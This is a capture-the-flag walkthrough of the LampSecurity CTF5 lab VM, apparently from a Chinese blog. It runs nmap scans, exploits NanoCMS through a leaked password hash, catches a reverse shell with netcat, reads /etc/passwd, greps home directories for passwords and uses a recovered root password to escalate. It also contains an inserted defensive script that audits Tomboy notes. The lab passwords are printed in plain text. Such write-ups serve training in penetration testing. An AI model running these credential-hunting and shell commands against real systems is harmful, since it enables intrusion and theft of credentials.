CTF5
Download: https://download.vulnhub.com/lampsecurity/ctf5.zip
1. Host discovery
sudo nmap -sn 192.168.239.0/24
[sudo] de1te 的密码:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-04 11:17 CST
Nmap scan report for 192.168.239.1
Host is up (0.00053s latency).
MAC Address: 00:50:56:C0:00:03 (VMware)
Nmap scan report for 192.168.239.136
Host is up (0.00015s latency).
MAC Address: 00:0C:29:6E:D6:7F (VMware)
Nmap scan report for 192.168.239.254
Host is up (0.00015s latency).
MAC Address: 00:50:56:E5:A0:93 (VMware)
Nmap scan report for 192.168.239.129
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 18.92 seconds
- The target is .136
2. Port scanning
- Scan for open ports
sudo nmap --min-rate 10000 -p- 192.168.239.136
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-04 11:18 CST
Nmap scan report for 192.168.239.136
Host is up (0.00065s latency).
Not shown: 65524 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
25/tcp    open  smtp
80/tcp    open  http
110/tcp   open  pop3
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
143/tcp   open  imap
445/tcp   open  microsoft-ds
901/tcp   open  samba-swat
3306/tcp  open  mysql
53344/tcp open  unknown
MAC Address: 00:0C:29:6E:D6:7F (VMware)

Nmap done: 1 IP address (1 host up) scanned in 14.54 seconds
- Identify the service and version on each open port
sudo nmap -sT -sV -O -p22,25,80,110,111,139,143,445,901,3306,53344 192.168.239.136
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-04 14:14 CST
Nmap scan report for 192.168.239.136
Host is up (0.00047s latency).

PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 4.7 (protocol 2.0)
25/tcp    open  smtp?
80/tcp    open  http        Apache httpd 2.2.6 ((Fedora))
110/tcp   open  pop3        ipop3d 2006k.101
111/tcp   open  rpcbind     2-4 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
143/tcp   open  imap        University of Washington IMAP imapd 2006k.396 (time zone: -0400)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
901/tcp   open  http        Samba SWAT administration server
3306/tcp  open  mysql       MySQL 5.0.45
53344/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:6E:D6:7F (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop
Service Info: Host: 192.168.239.136

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 175.52 seconds
- Vulnerability scan
sudo nmap --script=vuln -p22,25,80,110,111,139,143,445,901,3306,53344 192.168.239.136
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-04 14:19 CST
Nmap scan report for 192.168.239.136
Host is up (0.00021s latency).

PORT      STATE SERVICE
22/tcp    open  ssh
25/tcp    open  smtp
80/tcp    open  http
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|   /info.php: Possible information file
|   /phpmyadmin/: phpMyAdmin
|   /squirrelmail/src/login.php: squirrelmail version 1.4.11-1.fc8
|   /squirrelmail/images/sm_logo.png: SquirrelMail
|   /icons/: Potentially interesting folder w/ directory listing
|_  /inc/: Potentially interesting folder
|_http-trace: TRACE is enabled
|_http-csrf: Couldn't find any CSRF vulnerabilities.
110/tcp   open  pop3
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
143/tcp   open  imap
445/tcp   open  microsoft-ds
901/tcp   open  samba-swat
3306/tcp  open  mysql
53344/tcp open  unknown
MAC Address: 00:0C:29:6E:D6:7F (VMware)

Host script results:
|_smb-vuln-ms10-061: false
|_smb-vuln-ms10-054: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 473.91 seconds
- Nothing decisive here
3. Web penetration
- Browse the site and look for a way in
There is a page parameter; check whether it is a file inclusion.
It appears to be restricted, so let's look elsewhere.
A CMS shows up (NanoCMS); check searchsploit for any usable exploit.
searchsploit nanocms
----------------------------------------------------------- ---------------------------------
 Exploit Title                                             |  Path
----------------------------------------------------------- ---------------------------------
NanoCMS v0.4 - Remote Code Execution (RCE) (Authenticated) | php/webapps/50997.py
----------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Authenticated: this one can only be used after logging in.
A quick Google search for NanoCMS exploits turns up the following.
It says this file leaks the password hash.
Try it:
Indeed it does; crack the hash:
9d2f75377ac0ab991d40c91fd27e52fd:shannon
Try logging in at the CMS login.php.
Success; now look for something to exploit.
This page appears to be writable.
Request the written content while listening for the callback:
sudo nc -lvnp 443
[sudo] de1te 的密码:
listening on [any] 443 ...
connect to [192.168.239.129] from (UNKNOWN) [192.168.239.136] 51047
bash: no job control in this shell
bash-3.2$
4. Privilege escalation
bash-3.2$ whoami
apache
bash-3.2$ sudo -l
sudo: sorry, you must have a tty to run sudo
bash-3.2$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpm:x:37:37:RPM user:/var/lib/rpm:/sbin/nologin
polkituser:x:87:87:PolicyKit:/:/sbin/nologin
avahi:x:499:499:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
openvpn:x:498:497:OpenVPN:/etc/openvpn:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
torrent:x:497:496:BitTorrent Seed/Tracker:/var/spool/bittorrent:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
patrick:x:500:500:Patrick Fair:/home/patrick:/bin/bash
jennifer:x:501:501:Jennifer Sea:/home/jennifer:/bin/bash
andy:x:502:502:Andrew Carp:/home/andy:/bin/bash
loren:x:503:503:Loren Felt:/home/loren:/bin/bash
amy:x:504:504:Amy Pendelton:/home/amy:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
# shadow is not readable either
bash-3.2$ cat /etc/shadow
cat: /etc/shadow: Permission denied
- Privileges are low, but there are many users. Check for leaked sensitive files.
grep -ri "pass" /home 2>/dev/null
Recursively search every file under /home for the string "pass" (case-insensitive, errors suppressed):
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note: <title>Root password</title>
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note: <text xml:space="preserve"><note-content version="0.1">Root password
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note:Root password
- This looks promising
bash-3.2$ cat /home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note
<?xml version="1.0" encoding="utf-8"?>
<note version="0.2" xmlns:link="http://beatniksoftware.com/tomboy/link" xmlns:size="http://beatniksoftware.com/tomboy/size" xmlns="http://beatniksoftware.com/tomboy">
<title>Root password</title>
<text xml:space="preserve"><note-content version="0.1">Root password
Root password
50$cent</note-content></text>
<last-change-date>2012-12-05T07:24:52.7364970-05:00</last-change-date>
<create-date>2012-12-05T07:24:34.3731780-05:00</create-date>
<cursor-position>15</cursor-position>
<width>450</width>
<height>360</height>
<x>0</x>
<y>0</y>
<open-on-startup>False</open-on-startup>
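The note above is the plaintext Tomboy XML that handed over root. As an added defender-side check (not part of the original write-up), this Python script parses Tomboy .note files and reports notes whose title or body mention a credential, without echoing the value itself. The `/home/<user>/.tomboy/*.note` layout and the keyword list are assumptions; the embedded sample note is constructed with a placeholder secret.

```python
import re
import xml.etree.ElementTree as ET
from pathlib import Path

TOMBOY_NS = "{http://beatniksoftware.com/tomboy}"
# Terms that suggest a note holds a credential (constructed list; extend to taste)
SENSITIVE = re.compile(r"\b(pass(word|wd|phrase)?|secret|credential)\b", re.IGNORECASE)

def parse_note(note_xml):
    """Return (title, body text) of a Tomboy .note document given as str or bytes."""
    data = note_xml.encode("utf-8") if isinstance(note_xml, str) else note_xml
    root = ET.fromstring(data)
    title = root.findtext(TOMBOY_NS + "title", default="")
    content = root.find(TOMBOY_NS + "text/" + TOMBOY_NS + "note-content")
    body = "".join(content.itertext()) if content is not None else ""
    return title, body

def audit_note(note_xml):
    """Findings for one note: which lines mention a credential. Never prints the value."""
    title, body = parse_note(note_xml)
    findings = []
    if SENSITIVE.search(title):
        findings.append(f"title mentions a credential: {title!r}")
    for lineno, line in enumerate(body.splitlines(), 1):
        if SENSITIVE.search(line):
            findings.append(f"body line {lineno} mentions a credential")
    return findings

def audit_homes(home_root="/home"):
    """Walk every user's ~/.tomboy and return {path: findings} for suspicious notes only."""
    results = {}
    for note in Path(home_root).glob("*/.tomboy/*.note"):
        try:
            findings = audit_note(note.read_bytes())
        except ET.ParseError as exc:
            findings = [f"unparseable note: {exc}"]
        if findings:
            results[str(note)] = findings
    return results

# Constructed sample modelled on the note found on the box; the secret is a placeholder.
SAMPLE_NOTE = """<?xml version="1.0" encoding="utf-8"?>
<note version="0.2" xmlns="http://beatniksoftware.com/tomboy">
<title>Root password</title>
<text xml:space="preserve"><note-content version="0.1">Root password
EXAMPLE-PLACEHOLDER</note-content></text>
</note>"""
CLEAN_NOTE = SAMPLE_NOTE.replace("Root password", "Shopping list").replace("EXAMPLE-PLACEHOLDER", "eggs")
```

Run `audit_homes()` as root on the box to list offending notes; the sample yields a title hit plus one body-line hit, while the clean note yields nothing.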
The password is 50$cent; escalate with it:
bash-3.2$ python -c "import pty;pty.spawn('/bin/sh')"
sh-3.2$ su -
su -
Password: 50$cent
[root@localhost ~]#
Proof:
[root@localhost ~]# whoami
whoami
root
[root@localhost ~]# id
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:httpd_t:s0
[root@localhost ~]# sudo -l
sudo -l
User root may run the following commands on this host:
(ALL) ALL
From: https://www.cnblogs.com/nsqaq/p/17292659.html